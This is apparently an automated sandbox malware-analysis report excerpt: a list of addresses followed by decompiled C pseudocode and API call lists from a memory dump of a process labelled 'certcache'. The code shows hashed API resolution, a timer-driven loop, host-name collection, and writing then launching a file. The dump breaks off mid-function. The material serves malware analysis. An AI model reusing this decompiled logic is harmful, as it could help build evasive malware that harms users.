    0x001a3fdb
    0x001a3fde
    0x001a3fe5
    0x001a4053
    0x001a4053
    0x001a4059
    0x001a40b8
    0x001a40c4
    0x00000000
    0x001a405b
    0x001a405b
    0x001a405e
    0x001a4061
    0x001a40a2
    0x001a40b0
    0x001a40c7
    0x001a40c9
    0x00000000
    0x001a40cb
    0x001a40d1
    0x001a40d9
    0x001a40df
    0x001a40e2
    0x001a40e9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a40e9
    0x001a4063
    0x001a4063
    0x001a4063
    0x001a406a
    0x001a406d
    0x001a528f
    0x001a4061
    0x001a3fef
    0x001a40ef
    0x00000000
    0x001a40ef
    0x001a3fe5
    0x001a3fd6
    0x001a3faa
    0x001a3f9b
    0x001a3f91
    0x001a3d35
    0x001a3d35
    0x001a3d35
    0x001a3d3c
    0x001a3d3f
    0x001a3d3f
    0x001a3d2a
    0x001a3bc5
    0x001a37de
    0x001a37de
    0x001a37de
    0x001a37e5
    0x001a37e8
    0x001a37e8
    0x001a326b
    0x001a326b
    0x001a3274
    0x001a331b
    0x001a3326
    0x001a332c
    0x001a3334
    0x001a3339
    0x00000000
    0x001a333f
    0x001a333f
    0x001a3351
    0x001a3355
    0x001a34f8
    0x001a3515
    0x001a3520
    0x001a352e
    0x001a3554
    0x001a3558
    0x001a367b
    0x001a367f
    0x00000000
    0x001a3685
    0x001a3685
    0x001a3685
    0x001a368b
    0x001a36ad
    0x001a36ad
    0x001a36b3
    0x001a3711
    0x001a3727
    0x001a3713
    0x001a3719
    0x001a3719
    0x001a3736
    0x001a3773
    0x001a3738
    0x001a3746
    0x001a375c
    0x001a3748
    0x001a374e
    0x001a374e
    0x001a3768
    0x001a3768
    0x001a377f
    0x001a378b
    0x001a378f
    0x001a3793
    0x001a37a2
    0x001a37a4
    0x001a37b0
    0x001a37b6
    0x001a37bc
    0x001a37c8
    0x00000000
    0x001a36b5
    0x001a36b8
    0x001a36bb
    0x001a36dd
    0x001a36dd
    0x001a36e4
    0x001a36e7
    0x001a36bd
    0x001a36bd
    0x001a36bd
    0x001a36c4
    0x001a36c7
    0x001a36c7
    0x001a36bb
    0x001a368d
    0x001a368d
    0x001a368d
    0x001a3694
    0x001a3697
    0x001a3697
    0x001a368b
    0x001a3568
    0x001a3568
    0x001a356c
    0x001a360e
    0x001a3617
    0x001a3620
    0x001a3629
    0x001a362c
    0x001a362e
    0x00000000
    0x001a3634
    0x001a3634
    0x001a3634
    0x001a363a
    0x001a3662
    0x001a366a
    0x001a3670
    0x001a3673
    0x00000000
    0x001a363c
    0x001a363c
    0x001a363c
    0x001a3643
    0x001a3646
    0x001a3646
    0x001a363a
    0x001a3572
    0x001a3572
    0x001a3572
    0x001a3578
    0x001a35d7
    0x001a35e3
    0x00000000
    0x001a357a
    0x001a357a
    0x001a357d
    0x001a3580
    0x001a35c1
    0x001a35cf
    0x001a35e6
    0x001a35e8
    0x00000000
    0x001a35ea
    0x001a35f8
    0x001a3601
    0x001a3608
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3608
    0x001a3582
    0x001a3582
    0x001a3582
    0x001a3589
    0x001a358c
    0x001a358c
    0x001a3580
    0x001a3578
    0x001a356c
    0x001a3530
    0x001a3530
    0x001a3530
    0x001a3537
    0x001a353a
    0x001a353a
    0x001a335b
    0x001a335f
    0x001a343f
    0x001a343f
    0x001a3445
    0x001a34b1
    0x001a34bd
    0x00000000
    0x001a3447
    0x001a3447
    0x001a344a
    0x001a344d
    0x001a3499
    0x001a34a4
    0x001a34c0
    0x001a34c2
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a344f
    0x001a344f
    0x001a344f
    0x001a3456
    0x001a3459
    0x001a3459
    0x001a344d
    0x001a3365
    0x001a3365
    0x001a3369
    0x001a340b
    0x001a341a
    0x001a3426
    0x001a342f
    0x001a3434
    0x00000000
    0x001a343a
    0x001a34c8
    0x001a334b
    0x001a334e
    0x00000000
    0x001a334e
    0x001a336f
    0x001a336f
    0x001a336f
    0x001a3375
    0x001a33d4
    0x001a33e0
    0x00000000
    0x001a3377
    0x001a3377
    0x001a337a
    0x001a337d
    0x001a33be
    0x001a33cc
    0x001a33e3
    0x001a33e5
    0x00000000
    0x001a33e7
    0x001a33f5
    0x001a33fe
    0x001a3405
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3405
    0x001a337f
    0x001a337f
    0x001a337f
    0x001a3386
    0x001a3389
    0x001a3389
    0x001a337d
    0x001a3375
    0x001a3369
    0x001a335f
    0x001a3355
    0x001a327a
    0x001a327a
    0x001a327a
    0x001a3280
    0x001a32df
    0x001a32eb
    0x00000000
    0x001a3282
    0x001a3282
    0x001a3285
    0x001a3288
    0x001a32c9
    0x001a32d7
    0x001a32ee
    0x001a32f0
    0x00000000
    0x001a32f2
    0x001a3300
    0x001a3309
    0x001a3315
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3315
    0x001a328a
    0x001a328a
    0x001a328a
    0x001a3291
    0x001a3294
    0x001a3294
    0x001a3288
    0x001a3280
    0x001a3274
    0x001a3265
    0x001a318e
    0x001a318e
    0x001a318e
    0x001a3194
    0x001a31f3
    0x001a31ff
    0x00000000
    0x001a3196
    0x001a3196
    0x001a3199
    0x001a319c
    0x001a31dd
    0x001a31eb
    0x001a3202
    0x001a3204
    0x00000000
    0x001a3206
    0x001a3214
    0x001a321d
    0x001a3224
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a3224
    0x001a319e
    0x001a319e
    0x001a319e
    0x001a31a5
    0x001a31a8
    0x001a31a8
    0x001a319c
    0x001a3194
    0x001a4fea
    0x001a4fed
    0x001a4ff0
    0x001a5253
    0x001a5253
    0x001a525a
    0x001a525d
    0x001a4ff6
    0x001a4ff6
    0x001a4fff
    0x001a50a6
    0x001a50b1
    0x001a50b7
    0x001a50bf
    0x001a50c2
    0x001a50c4
    0x00000000
    0x001a50ca
    0x001a50ca
    0x001a50dc
    0x001a50e0
    0x00000000
    0x001a50e6
    0x001a50ea
    0x001a51c1
    0x001a51c1
    0x001a51c7
    0x001a5226
    0x001a5232
    0x00000000
    0x001a51c9
    0x001a51c9
    0x001a51cc
    0x001a51cf
    0x001a5210
    0x001a521e
    0x001a5235
    0x001a5237
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a51d1
    0x001a51d1
    0x001a51d1
    0x001a51d8
    0x001a51db
    0x001a5275
    0x001a51cf
    0x001a50f0
    0x001a50f0
    0x001a50f4
    0x001a5196
    0x001a519f
    0x001a51ab
    0x001a51b4
    0x001a51b9
    0x00000000
    0x001a51bf
    0x001a5239
    0x001a5242
    0x001a524b
    0x001a50d6
    0x001a50d9
    0x00000000
    0x001a50d9
    0x001a50fa
    0x001a50fa
    0x001a50fa
    0x001a5100
    0x001a515f
    0x001a516b
    0x00000000
    0x001a5102
    0x001a5102
    0x001a5105
    0x001a5108
    0x001a5149
    0x001a5157
    0x001a516e
    0x001a5170
    0x00000000
    0x001a5172
    0x001a5180
    0x001a5189
    0x001a5190
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a5190
    0x001a510a
    0x001a510a
    0x001a510a
    0x001a5111
    0x001a5114
    0x001a5277
    0x001a5108
    0x001a5100
    0x001a50f4
    0x001a50ea
    0x001a50e0
    0x001a5005
    0x001a5005
    0x001a5005
    0x001a500b
    0x001a506a
    0x001a5076
    0x00000000
    0x001a500d
    0x001a500d
    0x001a5010
    0x001a5013
    0x001a5054
    0x001a5062
    0x001a5079
    0x001a507b
    0x00000000
    0x001a507d
    0x001a508b
    0x001a5094
    0x001a50a0
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a50a0
    0x001a5015
    0x001a5015
    0x001a5015
    0x001a501c
    0x001a501f
    0x001a5279
    0x001a5013
    0x001a500b
    0x001a4fff
    0x001a4ff0
    0x001a4fe4
    0x001a48e8
    0x00000000
    0x00000000
    0x00000000
    0x001a4477
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a4de4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x001a2f58
    0x001a5291
    0x001a5291
    0x001a5296
    0x001a5297
    0x00000000
    0x001a5297
    0x001a5521
    0x001a5525

    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd

    Control-flow Graph

    C-Code - Quality: 40%
    			E001A9CB8(void* __ecx, void* __edx, void* __edi) {
    				struct HINSTANCE__* _t17;
    				struct HINSTANCE__* _t23;
    				struct HINSTANCE__* _t29;
    				struct HINSTANCE__* _t35;
    				struct HINSTANCE__* _t41;
    				struct HINSTANCE__* _t47;
    				struct HINSTANCE__* _t53;
    				struct HINSTANCE__* _t59;
    				void* _t96;
    				void* _t97;
    				void* _t98;
    				void* _t99;
    				void* _t100;
    				void* _t101;
    				void* _t102;
    				void* _t103;
    				void* _t104;
    				void* _t106;
    
    				_t96 = __edi;
    				L001A1830(__ecx, __edx);
    				_t97 =  *(_t106 - 4);
    				_t17 = LoadLibraryW(_t97);
    				_push(0x1ac040);
    				_push(0x30116feb);
    				_push(0x21);
    				L001A1B10(_t17, 0x1a1040, _t96, _t97);
    				HeapFree(GetProcessHeap(), 0, _t97);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a1568, 0xc);
    				_t98 =  *(_t106 - 4);
    				_t23 = LoadLibraryW(_t98);
    				_push(0x1ac0c8);
    				_push(0x1f598772);
    				_push(1);
    				L001A1B10(_t23, 0x1a1024, _t96, _t98);
    				HeapFree(GetProcessHeap(), 0, _t98);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a1574, 0xc);
    				_t99 =  *(_t106 - 4);
    				_t29 = LoadLibraryW(_t99);
    				_push(0x1ac214);
    				_push(0x41696925);
    				_push(2);
    				L001A1B10(_t29, 0x1a1028, _t96, _t99);
    				HeapFree(GetProcessHeap(), 0, _t99);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a1580, 0xc);
    				_t100 =  *(_t106 - 4);
    				_t35 = LoadLibraryW(_t100);
    				_push(0x1ac0c4);
    				_push(0x37dff52a);
    				_push(1);
    				L001A1B10(_t35, 0x1a100c, _t96, _t100);
    				HeapFree(GetProcessHeap(), 0, _t100);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a1550, 0xc);
    				_t101 =  *(_t106 - 4);
    				_t41 = LoadLibraryW(_t101);
    				_push(0x1ac0cc);
    				_push(0x14c87d5f);
    				_push(1);
    				L001A1B10(_t41, 0x1a10c4, _t96, _t101);
    				HeapFree(GetProcessHeap(), 0, _t101);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a1544, 0xc);
    				_t102 =  *(_t106 - 4);
    				_t47 = LoadLibraryW(_t102);
    				_push(0x1ac21c);
    				_push(0x786d5b64);
    				_push(2);
    				L001A1B10(_t47, 0x1a10c8, _t96, _t102);
    				HeapFree(GetProcessHeap(), 0, _t102);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a1598, 0xc);
    				_t103 =  *(_t106 - 4);
    				_t53 = LoadLibraryW(_t103);
    				_push(0x1ac230);
    				_push(0x53973344);
    				_push(0xe);
    				L001A1B10(_t53, 0x1a1220, _t96, _t103);
    				HeapFree(GetProcessHeap(), 0, _t103);
    				_push(_t106 - 4);
    				_push(0x4b85ca91);
    				L001A1830(0x1a158c, 0xc);
    				_t104 =  *(_t106 - 4);
    				_t59 = LoadLibraryW(_t104);
    				_push(0x1ac224);
    				_push(0x221bf2d2);
    				_push(3);
    				L001A1B10(_t59, 0x1a1214, _t96, _t104);
    				HeapFree(GetProcessHeap(), 0, _t104);
    				return L001A92F0(_t59);
    			}






















    APIs
    • LoadLibraryW.KERNEL32(?), ref: 001A9CC4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9CE8
    • HeapFree.KERNEL32(00000000), ref: 001A9CEF
    • LoadLibraryW.KERNEL32(?), ref: 001A9D14
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9D38
    • HeapFree.KERNEL32(00000000), ref: 001A9D3F
    • LoadLibraryW.KERNEL32(?), ref: 001A9D64
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9D88
    • HeapFree.KERNEL32(00000000), ref: 001A9D8F
    • LoadLibraryW.KERNEL32(?), ref: 001A9DB4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9DD8
    • HeapFree.KERNEL32(00000000), ref: 001A9DDF
    • LoadLibraryW.KERNEL32(?), ref: 001A9E04
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9E28
    • HeapFree.KERNEL32(00000000), ref: 001A9E2F
    • LoadLibraryW.KERNEL32(?), ref: 001A9E54
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9E78
    • HeapFree.KERNEL32(00000000), ref: 001A9E7F
    • LoadLibraryW.KERNEL32(?), ref: 001A9EA4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9EC8
    • HeapFree.KERNEL32(00000000), ref: 001A9ECF
    • LoadLibraryW.KERNEL32(?), ref: 001A9EF4
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9F18
    • HeapFree.KERNEL32(00000000), ref: 001A9F1F
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 89%
    			E001A8E20(void* __ebx, void* __edx, void* __edi) {
    				void* _v16;
    				void* _v24;
    				char _v28;
    				void* _v32;
    				char _v36;
    				intOrPtr _v44;
    				void* _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				intOrPtr _v72;
    				char _v76;
    				void* _v84;
    				void* _v92;
    				signed int _t28;
    				long _t29;
    
    				_t28 = GetTickCount();
    				if(_t28 <  *0x1ac278) {
    					L24:
    					return _t28;
    				} else {
    					_t29 =  *0x1ac280; // 0x0
    					_t28 = _t29 - 1;
    					if(_t28 > 3) {
    						goto L24;
    					} else {
    						switch( *((intOrPtr*)(_t28 * 4 +  &M001A9094))) {
    							case 0:
    								 *0x1ac280 = 2;
    								return _t28;
    								goto L25;
    							case 1:
    								 *0x1ac280 = 0;
    								__eax = L001A9670();
    								__eax = __eax;
    								if(__eax == 0) {
    									 *0x1ac280 = 3;
    									_pop(__esi);
    									return __eax;
    								} else {
    									if(__eax != 0) {
    										goto L24;
    									} else {
    										__eax = SetEvent( *0x1ac29c);
    										_pop(__esi);
    										return __eax;
    									}
    								}
    								goto L25;
    							case 2:
    								 *0x1ac280 = 0;
    								 *0x1ac294 = 0x1a1270;
    								 *0x1ac298 = 0x1a1270;
    								__eax = L001A2310();
    								__eax =  *0x1ac02c; // 0x1a12f8
    								 *0x1ac26c = __eax;
    								__eax =  *0x1ac030; // 0x6a
    								 *0x1ac268 = 0x1ac2a8;
    								 *0x1ac270 = __eax;
    								 *0x1ac280 = 4;
    								_pop(__esi);
    								return __eax;
    								goto L25;
    							case 3:
    								__ecx =  &_v28;
    								 *0x1ac280 = 0;
    								__eax = L001A8BF0( &_v28);
    								__ecx =  &_v36;
    								__eax = L001A8D90(__eax,  &_v36);
    								__eax =  *0x1acbd0; // 0x0
    								_push(0x1ac2a8);
    								_v32 = __eax;
    								_v44 = 0x1ac2a8;
    								_v44 =  *0x1ac130();
    								__eax =  *0x1ac2a4; // 0x0
    								_v52 = __eax;
    								do {
    									__ecx =  &_v24;
    									__esi = 0xdbba0;
    									__eax = L001A8960(__edx, 0xdbba0);
    									__ecx =  &_v16;
    									__eax = L001AA7F0(__edx, 0xdbba0);
    									__edx =  &_v52;
    									__ecx =  &_v84;
    									if(L001A9FD0(__ebx, __ecx, __edx) != 0) {
    										__eax =  &_v92;
    										_push( &_v92);
    										__eax =  &_v84;
    										_push(__eax);
    										__eax = L001A8560(__eax, __ecx);
    										__esp = __esp + 8;
    										if(__eax == 0) {
    											__eax =  *0x1ac298; // 0x0
    											__esi = 0x7530;
    											__eax = __eax + 8;
    											 *0x1ac298 = __eax;
    											 *0x1ac298 = __eax;
    										} else {
    											__eax = L001A99F0(__eax, __ecx, __edi);
    											__ecx = 0;
    											__eax = E001A88F0(0);
    											__ecx = 0;
    											__eax = E001AA7A0(0);
    											__edx =  &_v76;
    											__ecx =  &_v92;
    											if(L001AA1D0( &_v92, __edx) != 0) {
    												__eax = L001A1750(__edi);
    												__edx = _v72;
    												if(__edx != 0) {
    													__ecx = _v76;
    													__eax = L001A9AE0(__eax, _v76, __edx);
    												}
    												__eax = L001A1750(__edi);
    												__edx = _v64;
    												if(__edx != 0) {
    													__ecx = _v68;
    													__eax = L001A89D0(__edx, __esi);
    													__esi = 0;
    												}
    												__eax = L001A1750(__edi);
    												__edx = _v56;
    												if(__edx != 0) {
    													__ecx = _v60;
    													__eax = L001AA860(__edx, __esi);
    													__esi = 0;
    												}
    											}
    											GetProcessHeap() = HeapFree(__eax, 0, _v92);
    										}
    										GetProcessHeap() = HeapFree(__eax, 0, _v84);
    									}
    									GetProcessHeap() = HeapFree(__eax, 0, _v24);
    									GetProcessHeap() = HeapFree(__eax, 0, _v16);
    								} while (__esi == 0);
    								__eax = GetTickCount();
    								__eax = __eax + __esi;
    								 *0x1ac280 = 4;
    								 *0x1ac278 = __eax;
    								GetProcessHeap() = HeapFree(__eax, 0, _v32);
    								goto L24;
    						}
    					}
    				}
    				L25:
    			}





















    APIs
    • GetTickCount.KERNEL32 ref: 001A8E2A
    • SetEvent.KERNEL32 ref: 001A8E84
    • lstrlen.KERNEL32 ref: 001A8F26
    • HeapFree.KERNEL32(00000000), ref: 001A9087
      • Part of subcall function 001A88F0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001A8908
      • Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
      • Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
      • Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
      • Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A8FF2
    • HeapFree.KERNEL32(00000000), ref: 001A8FF9
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9028
    • HeapFree.KERNEL32(00000000), ref: 001A902F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A903B
    • HeapFree.KERNEL32(00000000), ref: 001A9042
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A904E
    • HeapFree.KERNEL32(00000000), ref: 001A9055
    • GetTickCount.KERNEL32 ref: 001A9063
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A9080
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    APIs
    • _snwprintf.NTDLL ref: 001A94DE
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A94EA
    • HeapFree.KERNEL32(00000000), ref: 001A94F1
    • _snwprintf.NTDLL ref: 001A950F
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001A951B
    • HeapFree.KERNEL32(00000000), ref: 001A9522
    • CreateFileW.KERNEL32(001AC9C8,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001A953C
    • GetComputerNameW.KERNEL32(?,?), ref: 001A95B1
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001A9601
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A9608
    • _snprintf.NTDLL ref: 001A9642
    • GetProcessHeap.KERNEL32(00000000,00000010), ref: 001A964E
    • HeapFree.KERNEL32(00000000), ref: 001A9655
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1a0000_certcache.jbxd
    C-Code - Quality: 56%
    			E001AA658() {
    				void* _t22;
    				void* _t24;
    				void* _t26;
    
    				WriteFile();
    				CloseHandle(_t24);
    				memset(_t26 - 0x5c, 0, 0x44);
    				 *(_t26 - 0x5c) = 0x44;
    				if(CreateProcessW(_t26 - 0x320, 0, 0, 0, 0, 0, 0, 0, _t26 - 0x5c, _t26 - 0x18) != 0) {
    					CloseHandle( *(_t26 - 0x18));
    					_push( *((intOrPtr*)(_t26 - 0x14)));
    					CloseHandle();
    				}
    				HeapFree(GetProcessHeap(), 0, _t22);
    				return 0;
    			}







    APIs
    • WriteFile.KERNEL32 ref: 001AA658
    • CloseHandle.KERNEL32 ref: 001AA65F
    • memset.NTDLL ref: 001AA66D
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 001AA69A
    • CloseHandle.KERNEL32(?), ref: 001AA6A7
    • CloseHandle.KERNEL32(?), ref: 001AA6B0
    • GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
    • HeapFree.KERNEL32(00000000), ref: 001AA6C0
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 100%
    			E001AA6E0(void* __ecx) {
    				void* _t15;
    				void* _t22;
    				void _t25;
    				void* _t29;
    				void* _t31;
    				void* _t32;
    				void* _t33;
    
    				_t31 = __ecx;
    				_t15 = RtlAllocateHeap(GetProcessHeap(), 8,  *((intOrPtr*)(__ecx + 0xc)) + 0x10);
    				_t33 = _t15;
    				if(_t33 == 0) {
    					return _t15;
    				} else {
    					 *_t33 =  *_t31;
    					 *((intOrPtr*)(_t33 + 4)) =  *((intOrPtr*)(_t31 + 4));
    					_t4 = _t33 + 0x10; // 0x10
    					_t29 = _t4;
    					 *(_t33 + 8) = _t29;
    					 *(_t33 + 0xc) =  *(_t31 + 0xc);
    					memcpy(_t29,  *(_t31 + 8),  *(_t31 + 0xc));
    					_t32 = RtlAllocateHeap(GetProcessHeap(), 8, 0xc);
    					if(_t32 == 0) {
    						L5:
    						return HeapFree(GetProcessHeap(), 0, _t33);
    					}
    					 *(_t32 + 4) =  *_t33;
    					_t22 = CreateThread(0, 0, 0x1aa3f0, _t33, 0, 0);
    					 *(_t32 + 8) = _t22;
    					if(_t22 == 0) {
    						HeapFree(GetProcessHeap(), 0, _t32);
    						goto L5;
    					}
    					_t25 =  *0x1acbd4; // 0x0
    					 *_t32 = _t25;
    					 *0x1acbd4 = _t32;
    					return _t25;
    				}
    			}
    APIs
    • GetProcessHeap.KERNEL32(00000008,?), ref: 001AA6ED
    • RtlAllocateHeap.NTDLL(00000000), ref: 001AA6F4
    • memcpy.NTDLL(00000010,?,?), ref: 001AA721
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 001AA72E
    • RtlAllocateHeap.NTDLL(00000000), ref: 001AA735
    • CreateThread.KERNEL32(00000000,00000000,Function_0000A3F0,00000000,00000000,00000000), ref: 001AA754
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001AA774
    • HeapFree.KERNEL32(00000000), ref: 001AA77B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001AA784
    • HeapFree.KERNEL32(00000000), ref: 001AA78B
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    APIs
    • CreateEventW.KERNEL32 ref: 001A91F0
    • SignalObjectAndWait.KERNEL32(00000000,000000FF,00000000), ref: 001A920A
    • ResetEvent.KERNEL32 ref: 001A9221
    • ReleaseMutex.KERNEL32 ref: 001A922A
    • CloseHandle.KERNEL32 ref: 001A9231
    • GetTickCount.KERNEL32 ref: 001A923B
    • CreateTimerQueueTimer.KERNEL32(?,00000000,Function_00008E20,00000000,00001388,000003E8,00000010), ref: 001A926E
    • WaitForSingleObject.KERNEL32(000000FF), ref: 001A9280
    • DeleteTimerQueueTimer.KERNEL32(00000000,?,000000FF), ref: 001A928D
    • CloseHandle.KERNEL32 ref: 001A9299
      • Part of subcall function 001AA7A0: WaitForSingleObject.KERNEL32(?,00000000), ref: 001AA7B8
      • Part of subcall function 001AA7A0: CloseHandle.KERNEL32(?), ref: 001AA7CC
      • Part of subcall function 001AA7A0: GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,001A8F95), ref: 001AA7D5
      • Part of subcall function 001AA7A0: HeapFree.KERNEL32(00000000,?,000DBBA0), ref: 001AA7DC
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 26%
    			E001AA515(void* __edi, void* __eflags) {
    				void* _t32;
    				void* _t34;
    				void* _t35;
    				void* _t37;
    
    				_t32 = __edi;
    				WriteFile(??, ??, ??, ??, ??);
    				CloseHandle(_t34);
    				L001A1830(0x1a1398, 4);
    				_t35 =  *(_t37 - 4);
    				 *0x1ac20c(_t37 - 0x528, 0x104, _t35, _t37 - 0x320, 0x6e15c1da, _t37 - 4);
    				HeapFree(GetProcessHeap(), 0, _t35);
    				_push(_t37 - 0x18);
    				_push( *((intOrPtr*)(_t37 + 8)));
    				if(L001A21B0(_t37 - 0x528, _t32) != 0) {
    					CloseHandle( *(_t37 - 0x18));
    					CloseHandle( *(_t37 - 0x14));
    				}
    				_push( *((intOrPtr*)(_t37 + 8)));
    				CloseHandle();
    				HeapFree(GetProcessHeap(), 0, _t32);
    				return 0;
    			}
    APIs
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 001A8C28
    • lstrlenW.KERNEL32(?), ref: 001A8C35
    • lstrlenW.KERNEL32(00000004), ref: 001A8C84
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001A8CA0
    • RtlAllocateHeap.NTDLL(00000000), ref: 001A8CA7
    • lstrcmpiW.KERNEL32(00000004,?), ref: 001A8CC5
    • lstrcpyW.KERNEL32(00000000,00000004), ref: 001A8CDA
    • lstrlenW.KERNEL32(00000004), ref: 001A8CE4
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    APIs
    • WTSGetActiveConsoleSessionId.KERNEL32 ref: 001AA420
    • GetTickCount.KERNEL32 ref: 001AA5BB
    • _snwprintf.NTDLL ref: 001AA60E
    • GetProcessHeap.KERNEL32(00000000,?), ref: 001AA61A
    • HeapFree.KERNEL32(00000000), ref: 001AA621
    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 001AA640
    • GetProcessHeap.KERNEL32(00000000), ref: 001AA6B9
    • HeapFree.KERNEL32(00000000), ref: 001AA6C0
    Memory Dump Source
    • Source File: 00000003.00000002.232787900.00000000001A1000.00000020.sdmp, Offset: 001A0000, based on PE: true
    • Associated: 00000003.00000002.232771181.00000000001A0000.00000002.sdmp
    • Associated: 00000003.00000002.232830528.00000000001AB000.00000002.sdmp
    • Associated: 00000003.00000002.232844801.00000000001AC000.00000004.sdmp
    C-Code - Quality: 26%
    			E001AA46E(void* __edi, void* __eflags) {
    				signed int _t22;
    				void* _t28;
    				void* _t59;
    				void* _t63;
    				void* _t64;
    				void* _t66;
    				void* _t67;
    
    				_t59 = __edi;
